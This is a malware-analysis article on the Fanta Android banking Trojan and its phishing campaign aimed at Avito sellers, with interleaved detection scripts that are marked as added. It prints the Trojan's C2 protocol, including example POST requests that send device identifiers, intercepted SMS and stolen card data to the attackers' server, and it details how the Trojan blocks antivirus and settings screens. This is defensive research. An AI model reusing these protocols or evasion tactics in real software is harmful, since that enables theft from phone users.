Leisya, Fanta: new tactics of an old Android Trojan


One day you decide to sell something on Avito and, after posting a detailed description of your item (say, a RAM module), you receive this message:

[screenshot]

When you open the link, you see a seemingly harmless page informing you, the happy and successful seller, that a purchase has been made:

[screenshot]

As soon as you click the "Continue" button, an APK file with an icon and a trustworthy-looking name is downloaded to your Android device. You installed an application which for some reason requested AccessibilityService rights, after which a couple of windows appeared and quickly disappeared and... that's it.

You go to check how things stand, but for some reason your banking app asks for your card details again. Once you enter the data, something bad happens: for reasons you still don't understand, money starts draining from your account. You try to fix the problem, but your phone resists: it presses the "Back" and "Home" keys on its own, refuses to switch off and won't let you enable any protective measures. As a result, you are left without money, your item has not been bought, and you are confused and wondering: what just happened?

The answer is simple: you have become a victim of the Android Trojan Fanta, a member of the Flexnet family. How did this happen? Let's explain.

Authors: Andrey Polovinkin, senior malware analysis specialist; Ivan Pisarev, malware analysis specialist.

Some statistics

The Flexnet family of Android Trojans was first identified in 2015. Over its long period of activity the family has grown into several subspecies: Fanta, Limebot, Lipton and others. The Trojan, and the infrastructure connected with it, does not stand still: new distribution schemes are being developed (in our case, high-quality phishing pages aimed at sellers on a particular classifieds site), and the Trojan's developers follow the latest trends in virus writing, adding new functionality that makes it easier to steal money from infected devices and to bypass protection mechanisms.

The campaign described in this article targets users in Russia; a small number of infected devices were recorded in Ukraine, and fewer still in Kazakhstan and Belarus.

Although Flexnet has been in the Android Trojan arena for more than 4 years and has been studied in detail by many researchers, it is still in good shape. Since January 2019 the potential damage has exceeded 35 million rubles, and that is for the campaign in Russia alone. In 2015, various versions of this Android Trojan were sold on underground forums, where the Trojan's source code with a detailed description could also be found. This means that the figures for damage worldwide are even more impressive. Not a bad showing for such an old-timer, is it?

[screenshot]

From selling to fraud

As can be seen from the screenshots shown earlier, the phishing page imitating the Avito classifieds site was prepared for a specific victim. Apparently the attackers use one of the Avito parsers, which extracts the seller's phone number and name as well as the product description. After building the page and preparing the APK file, the victim is sent an SMS with their name and a link to a phishing page containing the description of their item and the amount supposedly received from its "sale". By clicking the button, the user receives a malicious APK file: Fanta.

Research into the shcet491[.]ru domain showed that it was delegated to Hostinger's DNS servers:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

The domain's zone file contains records pointing to the IP addresses 31.220.23[.]236, 31.220.23[.]243 and 31.220.23[.]235. However, the domain's historical A record points to a server with the IP address 178.132.1[.]240.

The IP address 178.132.1[.]240 is located in the Netherlands and belongs to the hoster WorldStream. The IP addresses 31.220.23[.]235, 31.220.23[.]236 and 31.220.23[.]243 are located in the UK and belong to a HOSTINGER shared server. The registrar used is openprov-ru. The following domains also resolved to the IP address 178.132.1[.]240:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

It should be noted that links of the following form were present on almost all of these domains:

http://(www.){0,1}<%domain%>/[0-9]{7}

The link from the SMS message also fits this template. Based on historical data, it was found that one domain corresponds to several links matching the pattern above, which indicates that a single domain was used to distribute the Trojan to several victims.
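As an added illustration (not part of the original article), the following Python helper turns the link template above and the domain list from this section into a simple detection check that can be run over SMS-gateway or proxy log lines. The log lines, phone numbers and the "another-site.ru" domain in the sample are constructed for the example; only the template and the listed domains come from the article.

```python
import re

# Distribution-link template quoted in the article: http://(www.){0,1}<%domain%>/[0-9]{7}
# The lookahead rejects paths that continue past the seven digits.
LINK_RE = re.compile(r"https?://(?:www\.)?([a-z0-9.-]+)/(\d{7})(?![\w/])", re.IGNORECASE)

# Domains listed in the article, kept in their defanged form and refanged on use.
FANTA_DOMAINS_DEFANGED = [
    "shcet491[.]ru", "sdelka-ru[.]ru", "tovar-av[.]ru", "av-tovar[.]ru", "ru-sdelka[.]ru",
    "shcet382[.]ru", "sdelka221[.]ru", "sdelka211[.]ru", "vyplata437[.]ru",
    "viplata291[.]ru", "perevod273[.]ru", "perevod901[.]ru",
]


def refang(indicator):
    """Turn the defanged notation used in reports (hXXp, [.]) back into a matchable string."""
    return indicator.replace("[.]", ".").replace("hXXp", "http")


KNOWN_DOMAINS = {refang(d) for d in FANTA_DOMAINS_DEFANGED}


def find_distribution_links(text, known_domains=KNOWN_DOMAINS):
    """Return one dict per link in `text` that fits the template.
    `known` is True when the domain is one of the article's indicators; a hit with
    known=False is still worth a look, because the template itself is the tell."""
    hits = []
    for m in LINK_RE.finditer(refang(text)):
        domain = m.group(1).lower()
        hits.append({"domain": domain, "path_id": m.group(2), "known": domain in known_domains})
    return hits


def scan_lines(lines):
    """Scan log lines and return (line_number, hit) pairs for every matching link."""
    return [(n, hit) for n, line in enumerate(lines, 1) for hit in find_distribution_links(line)]


# Constructed sample lines: timestamps, numbers and "another-site.ru" are made up.
SAMPLE_LINES = [
    "2019-05-02 10:01 sms to +7900XXXXXXX url=http://www.shcet491.ru/1234567",
    "2019-05-02 10:02 proxy GET http://example.org/news/1234567/comments",
    "2019-05-02 10:03 sms to +7900XXXXXXX url=http://another-site.ru/7654321",
    "2019-05-02 10:04 proxy GET http://sdelka221.ru/123",
]

if __name__ == "__main__":
    for line_no, hit in scan_lines(SAMPLE_LINES):
        print(line_no, hit)
```

Line 1 is flagged as a known indicator, line 3 is flagged on the template alone, and lines 2 and 4 are ignored because their paths are not exactly seven digits.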

Let's jump ahead a little: the Trojan downloaded via the SMS link uses the address onuseseddohap[.]club as its control server. This domain was registered on 2019-03-12, and since 2019-04-29 APK applications have been communicating with it. According to data obtained from VirusTotal, a total of 109 applications have communicated with this server. The domain itself resolved to the IP address 217.23.14[.]27, which is located in the Netherlands and belongs to the hoster WorldStream. The registrar used is namecheap. The domains bad-racoon[.]club (since 2018-09-25) and bad-racoon[.]live (since 2018-10-25) also resolved to this IP address. More than 80 APKs were seen communicating with bad-racoon[.]club, and more than 100 with bad-racoon[.]live.

In general, the attack proceeds as follows:

[screenshot]

What's under the Fanta hood?

Like many other Android Trojans, Fanta can read and send SMS messages, make USSD requests and display its own windows on top of applications (including banking ones). However, the family's arsenal has grown: Fanta has begun to use the Accessibility Service for various purposes: reading the contents of notifications from other applications, preventing detection and preventing the Trojan from being stopped on the infected device, and more. Fanta works on all Android versions from 4.4 upward. In this article we take a detailed look at the following Fanta sample:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Immediately after launch

Immediately after launch, the Trojan hides its icon. The application only runs if the device name is not on the following list (an emulator check):

  • (first device name not recoverable from this copy)
  • VirtualBox
  • Nexus 5X (bullhead)
  • Nexus 5 (hammerhead)

This check is performed in the Trojan's main service, MainService. On first launch, the application's configuration parameters are initialised to their default values (the storage format of the configuration and its meaning are discussed later), and the newly infected device is registered with the control server. An HTTP POST request with the message type register_bot and information about the infected device (Android version, IMEI, phone number, operator name and the country code the user is registered in) is sent to the server. The address hXXp://onuseseddohap[.]club/controller.php serves as the control server. In response, the server sends a message containing the fields bot_id, bot_pwd and server; the application stores these as the CnC server parameters. The server parameter is optional: if the field is not received, Fanta uses the registration address hXXp://onuseseddohap[.]club/controller.php. The ability to change the CnC address solves two problems for the operators: distributing the load evenly between several servers (with a large number of infected devices, the load on an unoptimised web server can be high), and switching to an alternative server if one CnC server fails.

If an error occurs while sending the request, the Trojan repeats the registration after 20 seconds.

Once the device is registered successfully, Fanta shows the user the following message:

[screenshot]

Important detail: the service is called System Security, which is the name of the Trojan's service, and after clicking the OK button a window opens with the Accessibility settings of the infected device, where the user is expected to grant Accessibility rights to the malicious service:

[screenshot]

As soon as the user enables the Accessibility Service, Fanta gains access to the contents of application windows and the actions performed in them:

[screenshot]

Immediately after receiving Accessibility rights, the Trojan requests device administrator rights and the right to read notifications:

[screenshot]

Using the AccessibilityService, the application emulates key presses, thereby granting itself all the rights it needs.

Fanta creates several database instances (described later) needed to store configuration data and the information collected about the infected device. To send the collected information, the Trojan creates a scheduled repeating task that uploads rows from the database and receives a command from the control server. The CnC polling interval depends on the Android version: on 5.1 the interval is 10 seconds, otherwise 60 seconds.

To receive a command, Fanta sends a GetTask request to the control server. In response, the CnC can send one of the following commands:

Command   Description
0         Send an SMS message
1         Make a phone call or a USSD command
2         Change the interval parameter
3         Change the intercept parameter
6         Change the smsManager parameter
9         Start collecting SMS messages
11        Reset the phone to factory settings
12        Enable/disable dialog box logging

Fanta also collects notifications from 70 banking applications, fast payment systems and e-wallets and stores them in the database.

Storing configuration parameters

To store its configuration parameters, Fanta uses the standard Android platform mechanism: SharedPreferences files. The settings are saved in a file named settings. The stored parameters are described in the table below.

Name         Default value                  Possible values   Description
id           0                              Integer           Bot ID
server       hXXp://onuseseddohap[.]club/   URL               Control server address
pwd          -                              String            Server password
interval     20                             Integer           Time interval. Indicates how long the following operations are delayed:
                                                                • sending a request with the status of a sent SMS message
                                                                • receiving a new command from the control server
intercept    all                            all/telNumber     If the field equals the string all or telNumber, an incoming SMS message is intercepted by the application and not shown to the user
smsManager   0                              0/1               Enable/disable the application as the default SMS handler
readDialog   false                          true/false        Enable/disable AccessibilityEvent logging

Fanta also uses a second file, smsManager:

Name   Default value   Possible values   Description
pckg   -               String            Package name of the SMS handler that was in use
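As an added example that is not part of the original article, here is a Python parser for the two SharedPreferences files described above (settings and smsManager) together with a triage function that reports which of the stored parameters deviate from the defaults in the table. Android writes SharedPreferences as an XML `<map>` of typed elements; the element types used for each key (int, string, boolean) are an assumption, as the article gives only "Integer", "String" and "true/false", and both XML samples are constructed for this example.

```python
import xml.etree.ElementTree as ET

# Defaults from the configuration table in the article (server kept defanged, as written there).
DEFAULTS = {
    "id": 0,
    "server": "hXXp://onuseseddohap[.]club/",
    "pwd": "",
    "interval": 20,
    "intercept": "all",
    "smsManager": 0,
    "readDialog": False,
}


def parse_shared_prefs(xml_text):
    """Parse an Android SharedPreferences XML document into a dict of typed values."""
    prefs = {}
    for el in ET.fromstring(xml_text):
        name = el.get("name")
        if el.tag == "string":
            prefs[name] = el.text or ""
        elif el.tag in ("int", "long"):
            prefs[name] = int(el.get("value"))
        elif el.tag == "float":
            prefs[name] = float(el.get("value"))
        elif el.tag == "boolean":
            prefs[name] = el.get("value") == "true"
        elif el.tag == "set":
            prefs[name] = {child.text for child in el}
    return prefs


def triage_fanta_settings(settings, sms_manager=None):
    """Return human-readable findings derived from the parsed settings (and optional smsManager) files."""
    findings = []
    if settings.get("id", DEFAULTS["id"]) != 0:
        findings.append(f"bot is registered with the CnC (bot id {settings['id']})")
    server = settings.get("server", DEFAULTS["server"])
    if server != DEFAULTS["server"]:
        findings.append(f"non-default CnC address stored: {server}")
    if settings.get("interval", DEFAULTS["interval"]) != DEFAULTS["interval"]:
        findings.append(f"polling interval changed to {settings['interval']} s")
    if settings.get("intercept", DEFAULTS["intercept"]) in ("all", "telNumber"):
        findings.append(f"incoming SMS hidden from the user (intercept={settings['intercept']})")
    if settings.get("smsManager") == 1:
        findings.append("trojan enabled as default SMS handler")
    if settings.get("readDialog"):
        findings.append("AccessibilityEvent logging enabled")
    if sms_manager and sms_manager.get("pckg"):
        findings.append(f"original SMS handler recorded for restore: {sms_manager['pckg']}")
    return findings


# Constructed sample files: bot id, password and the handler package are made-up values.
SAMPLE_SETTINGS_XML = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <int name="id" value="4242" />
    <string name="server">hXXp://onuseseddohap[.]club/</string>
    <string name="pwd">s3cr3t</string>
    <int name="interval" value="20" />
    <string name="intercept">all</string>
    <int name="smsManager" value="1" />
    <boolean name="readDialog" value="false" />
</map>
"""
SAMPLE_SMSMANAGER_XML = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="pckg">com.android.messaging</string>
</map>
"""

if __name__ == "__main__":
    for line in triage_fanta_settings(parse_shared_prefs(SAMPLE_SETTINGS_XML),
                                      parse_shared_prefs(SAMPLE_SMSMANAGER_XML)):
        print("-", line)
```

On a device image, the files would be read from the application's shared_prefs directory; the parser is generic, so the same function serves any SharedPreferences file, and only the triage function encodes what the article says the keys mean.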

Working with databases

During operation the Trojan uses two databases. A database named a is used to store the various data collected from the phone. The second database is named fanta.db and stores the settings that control the creation of the phishing windows designed to collect bank card data.

The Trojan uses database a to store collected data and to log its own actions. The data is kept in the logs table, which is created with the following SQL query:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Accordingly, the database contains the following:

1. A record of the infected device starting up, with the message Phone turned on!

2. Notifications from applications. The message is built according to this template:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Bank card data from the phishing forms created by the Trojan. The VIEW_NAME parameter can be one of the following:

  • AliExpress
  • Avito
  • Google Play
  • Other <%App Name%>

The message is written in the format (the labels are Russian: "Номер карты" is the card number, "Дата" the expiry date):

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Incoming/outgoing SMS messages in the format ("Тип" is the type, "Входящее/Исходящее" incoming/outgoing):

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Information about the package that created a dialog box, in the format:

(<%Package name%>)<%Package information%>
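Because the record formats above are regular, a recovered copy of database a can be triaged automatically. The following Python is an added example (not code from the article): it creates the logs table with the exact CREATE statement quoted earlier, fills it with constructed rows in the five formats, classifies each row and masks card numbers so that a triage report never reproduces a full PAN. The English boot string "Phone turned on!" is this page's translation of the original record and is therefore an assumption; the card number, phone number and app names in the sample rows are made up.

```python
import re
import sqlite3

# CREATE statement for the logs table of database "a", as quoted in the article.
CREATE_LOGS = ("create table logs ( _id integer primary key autoincrement, "
               "d TEXT, f TEXT, p TEXT, m integer)")

# Record formats from the article. Labels inside the records are Russian:
# "Номер карты" = card number, "Дата" = date, "Тип" = type,
# "Входящее" = incoming, "Исходящее" = outgoing.
CARD_RE = re.compile(
    r"^\[(?P<time>[^\]]+)\]\((?P<view>[^)]+)\) Номер карты:(?P<pan>\d+); "
    r"Дата:(?P<month>\d{1,2})/(?P<year>\d{2,4}); CVV: (?P<cvv>\d+)$")
SMS_RE = re.compile(
    r"^\(\[(?P<time>[^\]]+)\] Тип: (?P<direction>Входящее|Исходящее)\) "
    r"(?P<number>[^:]+):(?P<text>.*)$", re.DOTALL)
# Package records look like notification records; a package name (dotted, lowercase) is
# checked first so that "(App Name)Title: text" still lands in the notification branch.
PKG_RE = re.compile(r"^\((?P<package>[a-z][a-z0-9_]*(?:\.[a-z0-9_]+)+)\)(?P<info>.*)$", re.DOTALL)
NOTIF_RE = re.compile(r"^\((?P<app>[^)]+)\)(?P<title>[^:]*): (?P<text>.*)$", re.DOTALL)
BOOT_TEXT = "Phone turned on!"  # translated on this page; the original string is assumed


def mask_pan(pan):
    """Keep only the last four digits of a card number for reporting."""
    return "*" * (len(pan) - 4) + pan[-4:]


def classify_record(d):
    """Map the text of one logs.d value to a record kind plus its parsed fields."""
    if d == BOOT_TEXT:
        return {"kind": "boot"}
    m = CARD_RE.match(d)
    if m:
        return {"kind": "card", "time": m["time"], "view": m["view"],
                "pan": mask_pan(m["pan"]), "expiry": f"{m['month']}/{m['year']}"}
    m = SMS_RE.match(d)
    if m:
        direction = "incoming" if m["direction"] == "Входящее" else "outgoing"
        return {"kind": "sms", "time": m["time"], "direction": direction,
                "number": m["number"], "text": m["text"]}
    m = PKG_RE.match(d)
    if m:
        return {"kind": "package", "package": m["package"], "info": m["info"]}
    m = NOTIF_RE.match(d)
    if m:
        return {"kind": "notification", "app": m["app"], "title": m["title"], "text": m["text"]}
    return {"kind": "unknown", "raw": d}


def triage_logs(conn):
    """Read every row of logs and return (rowid, classified record, p, m) tuples."""
    rows = conn.execute("select _id, d, p, m from logs order by _id").fetchall()
    return [(rid, classify_record(d), p, m) for rid, d, p, m in rows]


def summarize(conn):
    """Count records per kind, the first line of any triage report."""
    counts = {}
    for _, rec, _, _ in triage_logs(conn):
        counts[rec["kind"]] = counts.get(rec["kind"], 0) + 1
    return counts


def build_sample_db():
    """Constructed sample: an in-memory copy of database "a" with one row per record format."""
    conn = sqlite3.connect(":memory:")
    conn.execute(CREATE_LOGS)
    sample_rows = [
        (BOOT_TEXT, "", "", 0),
        ("[12:34:56 01.05.2019](Avito) Номер карты:4111111111111111; Дата:12/23; CVV: 123", "", "", 0),
        ("([12:35:00 01.05.2019] Тип: Входящее) +79001234567:Code 1234", "", "+79001234567", 1),
        ("(Example Bank)Transfer: 500 received", "", "", 0),
        ("(com.example.dialog)Dialog opened by package", "", "", 0),
    ]
    conn.executemany("insert into logs (d, f, p, m) values (?, ?, ?, ?)", sample_rows)
    conn.commit()
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    for rid, rec, p, m in triage_logs(db):
        print(rid, rec)
    print(summarize(db))
```

For a real image, replace build_sample_db() with sqlite3.connect() on the recovered file; the classifier only reads column d, and columns p and m are passed through because the article names them as the number and sms_mode values uploaded to the server.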

Example of the logs table:

[screenshot]

One of Fanta's functions is collecting bank card data. The data is collected through phishing windows created when banking applications are opened. The Trojan creates each phishing window only once. Information about whether a window has already been shown to the user is stored in the settings table of the fanta.db database. The table is created with the following SQL query:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

All fields of the settings table are initialised to 1 by default (show the phishing window). Once the user has entered their data, the value is set to 0. Examples of settings table fields:

  • can_login - responsible for showing the form when banking applications are opened
  • first_bank - not used
  • can_avito - responsible for showing the form when the Avito application is opened
  • can_ali - responsible for showing the form when the AliExpress application is opened
  • can_another - responsible for showing the form when any application from the list is opened: Yula, Pandao, Drom Auto, Wallet. Discount and bonus cards, Aviasales, Booking, Trivago
  • can_card - responsible for showing the form when Google Play is opened

Interaction with the control server

Network communication with the control server takes place over HTTP. For networking Fanta uses the popular Retrofit library. Requests are sent to hXXp://onuseseddohap[.]club/controller.php. The server address can be changed when registering with the server. Cookies may be sent by the server. Fanta makes the following requests to the server:

  • Bot registration with the control server, performed once, on first launch. The following data about the infected device is sent to the server:
    · cookie - cookies received from the server (the default value is an empty string)
    · mode - the constant string register_bot
    · prefix - the constant 2
    · version_sdk - built according to the template <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · imei - IMEI of the infected device
    · country - code of the country the user is registered in, in ISO format
    · number - phone number
    · operator - operator name

    Example of a request sent to the server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
    

    In response to this request the server must return a JSON object with the following parameters:
    · bot_id - ID of the infected device. If bot_id equals 0, Fanta repeats the request.
    · bot_pwd - server password.
    · server - control server address. Optional parameter. If it is not specified, the address stored in the application is used.

    Example JSON:

    {
        "response": [
            {
                "bot_id": <%BOT_ID%>,
                "bot_pwd": <%BOT_PWD%>,
                "server": <%SERVER%>
            }
        ],
        "status": "ok"
    }

  • Request to receive a command from the server. The following data is sent to the server:
    · cookie - cookies received from the server
    · bid - ID of the infected device, received in response to the register_bot request
    · pwd - server password
    · divice_admin - indicates whether administrator rights have been obtained: 1 if they have, otherwise 0
    · Accessibility - Accessibility Service status: 1 if the service is enabled, otherwise 0
    · SMSManager - indicates whether the Trojan is enabled as the default SMS application
    · screen - screen state: 1 if the screen is on, otherwise 0

    Example of a request sent to the server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Depending on the command, the server returns a JSON object with different parameters:

    · Command Send an SMS message: the parameters contain the phone number, the SMS text and the ID of the message being sent. The identifier is used later when reporting to the server with the setSmsStatus message type.

    {
        "response": [
            {
                "mode": 0,
                "sms_number": <%SMS_NUMBER%>,
                "sms_text": <%SMS_TEXT%>,
                "sms_id": <%SMS_ID%>
            }
        ],
        "status": "ok"
    }

    · Command Make a phone call or a USSD command: the phone number or command arrives in the command field of the response.

    {
        "response": [
            {
                "mode": 1,
                "command": <%TEL_NUMBER%>
            }
        ],
        "status": "ok"
    }

    · Command Change the interval parameter.

    {
        "response": [
            {
                "mode": 2,
                "interval": <%SECONDS%>
            }
        ],
        "status": "ok"
    }

    · Command Change the intercept parameter.

    {
        "response": [
            {
                "mode": 3,
                "intercept": "all" / "telNumber" / <%ANY_STRING%>
            }
        ],
        "status": "ok"
    }

    · Command Change the SmsManager parameter.

    {
        "response": [
            {
                "mode": 6,
                "enable": 0 / 1
            }
        ],
        "status": "ok"
    }

    · Command Collect SMS messages from the infected device.

    {
        "response": [
            {
                "mode": 9
            }
        ],
        "status": "ok"
    }

    · Command Reset the phone to factory settings:

    {
        "response": [
            {
                "mode": 11
            }
        ],
        "status": "ok"
    }

    · Command Change the ReadDialog parameter.

    {
        "response": [
            {
                "mode": 12,
                "enable": 0 / 1
            }
        ],
        "status": "ok"
    }

  • Sending a message with the setSmsStatus type. This request is made after the Send an SMS message command has been executed. The request looks like this:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Uploading the database contents. One row is sent per request. The following data is sent to the server:
    · cookie - cookies received from the server
    · mode - the constant string setSaveInboxSms
    · bid - ID of the infected device, received in response to the register_bot request
    · text - text of the current log record (field d of the logs table in database a)
    · number - name of the current database record (field p of the logs table in database a)
    · sms_mode - integer value (field m of the logs table in database a)

    The request looks like this:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    If the upload to the server succeeds, the row is deleted from the table. Example of the JSON object returned by the server:

    {
        "response": [],
        "status": "ok"
    }
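The request modes and reply shapes listed in this section, together with the command table and the register_bot flow described under "Immediately after launch", are regular enough to decode mechanically. The Python below is an added example, not code from the article or from Group-IB: it identifies Fanta requests in proxy-log records by their mode field and required parameters, decodes register_bot and getTask replies according to the rules the article gives (bot_id 0 means retry, a missing server field keeps the built-in address, mode numbers map to the command table), and flags matching traffic. All request bodies and reply documents in the sample are constructed; only the host, path, field names and mode codes come from the article, and the misspelt divice_admin field is kept because that is how it appears on the wire.

```python
import json
from urllib.parse import parse_qs

# Command codes from the GetTask table in the article.
COMMANDS = {
    0: "send_sms", 1: "call_or_ussd", 2: "set_interval", 3: "set_intercept",
    6: "set_sms_manager", 9: "collect_sms", 11: "factory_reset", 12: "set_read_dialog",
}

# Fields the article shows for each request mode (the cookie travels as an HTTP header).
REQUIRED_FIELDS = {
    "register_bot": {"prefix", "version_sdk", "imei", "country", "number", "operator"},
    "getTask": {"bid", "pwd", "divice_admin", "Accessibility", "SMSManager", "screen"},
    "setSmsStatus": {"id", "status_sms"},
    "setSaveInboxSms": {"bid", "text", "number", "sms_mode"},
}

# Built-in CnC address, written defanged as in the article.
DEFAULT_SERVER = "hXXp://onuseseddohap[.]club/controller.php"


def parse_request(body):
    """Decode a urlencoded POST body; return (mode, fields, missing_fields),
    or None when the body carries no Fanta request mode."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    mode = fields.get("mode")
    if mode not in REQUIRED_FIELDS:
        return None
    return mode, fields, REQUIRED_FIELDS[mode] - set(fields)


def parse_register_response(text, default_server=DEFAULT_SERVER):
    """Decode a register_bot reply the way the article says the bot treats it:
    bot_id 0 means the registration is repeated; no server field keeps the built-in address."""
    doc = json.loads(text)
    if doc.get("status") != "ok" or not doc.get("response"):
        return {"retry": True}
    item = doc["response"][0]
    bot_id = int(item.get("bot_id", 0))
    return {"retry": bot_id == 0, "bot_id": bot_id,
            "bot_pwd": str(item.get("bot_pwd", "")),
            "server": item.get("server") or default_server}


def parse_task_response(text):
    """Decode a getTask reply into named commands using the mode table."""
    doc = json.loads(text)
    if doc.get("status") != "ok":
        return []
    tasks = []
    for item in doc.get("response", []):
        mode = item.get("mode")
        params = {k: v for k, v in item.items() if k != "mode"}
        tasks.append({"command": COMMANDS.get(mode, f"unknown_{mode}"), "params": params})
    return tasks


def flag_cnc_traffic(records):
    """records: (host, path, body) tuples, e.g. from a proxy log. Returns the entries
    whose body is a Fanta request sent to a controller.php endpoint."""
    hits = []
    for host, path, body in records:
        parsed = parse_request(body)
        if parsed and path.endswith("/controller.php"):
            mode, _, missing = parsed
            hits.append({"host": host, "mode": mode, "complete": not missing})
    return hits


# Constructed samples: host, path and field names are from the article, the values are not.
SAMPLE_LOG = [
    ("onuseseddohap.club", "/controller.php",
     "mode=register_bot&prefix=2&version_sdk=TestModel%2F7.1.2(Avit)&imei=000000000000000"
     "&country=ru&number=%2B79000000000&operator=TestOperator"),
    ("onuseseddohap.club", "/controller.php",
     "mode=getTask&bid=4242&pwd=s3cr3t&divice_admin=1&Accessibility=1&SMSManager=0&screen=1"),
    ("example.org", "/api/login", "user=alice&pass=x"),
]
SAMPLE_REGISTER_REPLY = '{"response":[{"bot_id": 4242, "bot_pwd": "s3cr3t"}],"status":"ok"}'
SAMPLE_TASK_REPLY = '{"response":[{"mode": 2, "interval": 30},{"mode": 12, "enable": 1}],"status":"ok"}'

if __name__ == "__main__":
    for hit in flag_cnc_traffic(SAMPLE_LOG):
        print(hit)
    print(parse_register_response(SAMPLE_REGISTER_REPLY))
    print(parse_task_response(SAMPLE_TASK_REPLY))
```

The mode-plus-required-fields check is deliberately independent of the hostname, so it still fires after the operators move to a different server via the server field; the hostname in a hit is there for correlation, not as the trigger.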

Interaction with the AccessibilityService

The AccessibilityService was created to make Android devices easier to use for people with disabilities. In most cases, physical interaction is required to operate an application; the AccessibilityService allows this to be done programmatically. Fanta uses the service to create fake windows over banking applications and to prevent the user from opening the settings and certain applications.

Using AccessibilityService functionality, the Trojan monitors changes to the elements on the device's screen. As described earlier, Fanta's settings contain a parameter that controls the logging of dialog box operations: readDialog. If this parameter is set, information about the name and description of the package that triggered the event is added to the database. When events fire, the Trojan performs the following actions:

  • It emulates pressing the Back and Home keys in the following situations:
    · if the user wants to restart the device
    · if the user wants to uninstall the "Avito" application or change its permissions
    · if the "Avito" application is mentioned on the page
    · when the Google Play Protect application is opened
    · when pages with the AccessibilityService settings are opened
    · when the System Security dialog box appears
    · when the page with the "Draw over other apps" settings is opened
    · when the "Applications", "Recovery and reset", "Data reset", "Reset settings", "Developer panel", "Special. access", "Special access" or "Special rights" pages are opened
    · if the event was generated by one of the applications below.

    List of applications

    • Android
    • Master Lite
    • Clean Master
    • Clean Master for x86 CPU
    • Meizu Application Permission Management
    • MIUI Security
    • Clean Master - Antivirus & Cache and Garbage Cleaner
    • Parental Control and GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Virus Cleaner, Antivirus, Cleaner (MAX Security)
    • Mobile AntiVirus Security PRO
    • Avast antivirus & free protection 2019
    • Mobile Security MegaFon
    • AVG Protection for Xperia
    • Mobile Security
    • Malwarebytes Antivirus & Protection
    • Antivirus for Android 2019
    • Security Master - Antivirus, VPN, AppLock, Booster
    • AVG antivirus for Huawei tablet System Manager
    • Samsung Accessibility
    • Samsung Smart Manager
    • Security Master
    • Speed Booster
    • Dr. Web
    • Dr. Web Security Space
    • Dr.Web Mobile Control Center
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Center
    • Antivirus & Mobile Security
    • Kaspersky Internet Security: Antivirus and Protection
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security - protection and management
    • AVG Antivirus Free 2019 - Android Protection
    • Antivirus Android
    • Norton Mobile Security and Antivirus
    • Antivirus, firewall, VPN, mobile security
    • Mobile Security: antivirus, VPN, anti-theft protection
    • Antivirus for Android

  • If permission is requested when sending an SMS to a short number, Fanta tries to tick the Remember choice checkbox and press the Send button.
  • If an attempt is made to revoke the Trojan's administrator rights, it locks the phone.
  • It prevents new administrators from being added.
  • If the Dr.Web antivirus application detects a threat, Fanta emulates pressing the Ignore button.
  • The Trojan emulates pressing the Back and Home buttons if the event was generated by the Samsung Device Care application.
  • Fanta creates phishing windows with forms for entering bank card data if an application from a list of about 30 different online services is launched. Among them: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, etc.

Phishing forms

Fanta analyses which applications are running on the infected device. If an application of interest is opened, the Trojan displays a phishing window on top of all others, which is a form for entering bank card data. The user is asked to enter the following:

  • Card number
  • Expiry date
  • CVV
  • Cardholder name (not for all banks)

Depending on the application, different phishing windows are shown. Below are examples of some of them:

AliExpress:

[screenshot]

Avito:

[screenshot]

For other applications, e.g. Google Play Market, Aviasales, Pandao, Booking, Trivago:

[screenshot]

How it really was

